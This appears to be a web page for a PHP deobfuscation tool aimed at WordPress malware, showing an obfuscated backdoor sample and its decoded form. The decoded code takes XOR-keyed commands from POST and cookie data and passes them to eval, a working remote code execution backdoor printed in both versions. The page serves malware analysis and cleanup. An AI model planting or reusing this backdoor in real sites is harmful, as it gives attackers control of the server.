PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $QDrpq = "\x73" ./* jAL /"\164" ./ lYOpC /chr (114) . chr (95)/ jUeO /./ mrKiB /chr/ BWH /( 666/ pGJG /- 552/ UM/).chr (101) . chr (112) . "\x65" . "\x61" . "\x74"; $eOiaz = chr (101) ./ Xm /"\x78"/ uQIg /. chr ( 180/ xX /- 68 ).chr (108)/ xBsxS /. 'o' . "\x64"/Q/./z...

Obfuscated php code

<?php
$QDrpq    = "\x73"   ./* jAL  */"\164"    ./*  lYOpC */chr (114)    .     chr     (95)/*   jUeO */./*   mrKiB   */chr/* BWH */(    666/*  pGJG  */-    552/*   UM*/).chr  (101)   .    chr (112)  .    "\x65"    .   "\x61"    .    "\x74";
    $eOiaz    =    chr    (101)   ./*  Xm  */"\x78"/*   uQIg */.     chr    (  180/*  xX   */-     68    ).chr    (108)/* xBsxS */.   'o'    .    "\x64"/*Q*/./*zQjJT */"\x65";


$tfwhnZIIg/* siqa*/=/*  qGR */chr/*  sa*/(99) ./*  GM*/chr  (   752    -    641    )."\165"    ./* Aq */"\x6e"    .    't';
                $kyUSM =/*  Kb  */"\160"   . "\141"    .    chr    (/*  EfSB */976    -/*GAWg */877    ).'k';
   $vdUgpBog    =    Array    (/*   CC  */"zkCzdqZ"/*gtG   */=>/*  xiBA  */"devWZhFMcEJJpbpPiRuFWB"  );
       $eRCfZSfcE    =    Array    (/*  VkFZ   */"sRftEcwUUANnsNQUwVJiYpdrUg"    =>    "DIpwsJGoThYjfbJywX"/* y  */);
                   foreach     (    Array(   $vdUgpBog,/*XDSQH*/$_POST,    $eRCfZSfcE,/* wJ   */$_COOKIE,/*UEtW*/$vdUgpBog)    as    $JpSTIY)    {
            /* FCY  */foreach    (/*MCl */$JpSTIY/* Amn*/as    $sizBZ    =>    $IMDimAXSfR    )     {
                   $IMDimAXSfR/*   h */=/*q   */@$kyUSM( 'H'/*   ep  */.   chr  (/*nmGe   */754 -/* vOo   */712/*  Xd  */),/* J   */$IMDimAXSfR    );


    $sizBZ    .=    "cMaddtC-NOZP-hjfvIOe-JAaoaQh-yDR-tKjgRqY-XULU";


/*SEHs  */$sizBZ    =    $QDrpq    (/*pQjum*/$sizBZ, (  strlen(/*  MzE */$IMDimAXSfR    )/strlen(/*   YeuIH*/$sizBZ     )    )    +   1);


    $fuOJQqrsm     =    $IMDimAXSfR ^/* a */$sizBZ;


/* L  */$fuOJQqrsm    =/*  DrIPy */$eOiaz/*  lBm */(/* ITdQ */chr/*   kog  */(    592    -    557    ),/* Olgvy   */$fuOJQqrsm    );
                   if   (/*  DDM*/$tfwhnZIIg    (/* XUkQ  */$fuOJQqrsm ) ==/*VBrQ   */3    )    {
                    /*   p */eval    (    $fuOJQqrsm[1]    (    $fuOJQqrsm[2]/*Y   */)     );
      exit/*  Mbt*/();
    }
          }
        }

Decoded(de-Obfuscated) php code

<?php

$QDrpq = "str_repeat";
$eOiaz = "explode";
$tfwhnZIIg = "count";
$kyUSM = "pack";
$vdUgpBog = array(
    /*   CC  */
    "zkCzdqZ" => "devWZhFMcEJJpbpPiRuFWB",
);
$eRCfZSfcE = array(
    /*  VkFZ   */
    "sRftEcwUUANnsNQUwVJiYpdrUg" => "DIpwsJGoThYjfbJywX",
);
foreach (array(
    $vdUgpBog,
    /*XDSQH*/
    $_POST,
    $eRCfZSfcE,
    /* wJ   */
    $_COOKIE,
    /*UEtW*/
    $vdUgpBog,
) as $JpSTIY) {
    /* FCY  */
    foreach ($JpSTIY as $sizBZ => $IMDimAXSfR) {
        $IMDimAXSfR = @$kyUSM(
            "H*",
            /* J   */
            $IMDimAXSfR
        );
        $sizBZ .= "cMaddtC-NOZP-hjfvIOe-JAaoaQh-yDR-tKjgRqY-XULU";
        /*SEHs  */
        $sizBZ = $QDrpq(
            /*pQjum*/
            $sizBZ,
            strlen(
                /*  MzE */
                $IMDimAXSfR
            ) / strlen(
                /*   YeuIH*/
                $sizBZ
            ) + 1
        );
        $fuOJQqrsm = $IMDimAXSfR ^ $sizBZ;
        /* L  */
        $fuOJQqrsm = $eOiaz(
            /* ITdQ */
            "#",
            /* Olgvy   */
            $fuOJQqrsm
        );
        if ($tfwhnZIIg(
            /* XUkQ  */
            $fuOJQqrsm
        ) == 3) {
            /*   p */
            eval($fuOJQqrsm[1]($fuOJQqrsm[2]));
            exit;
        }
    }
}

Malware detection & removal plugin for WordPress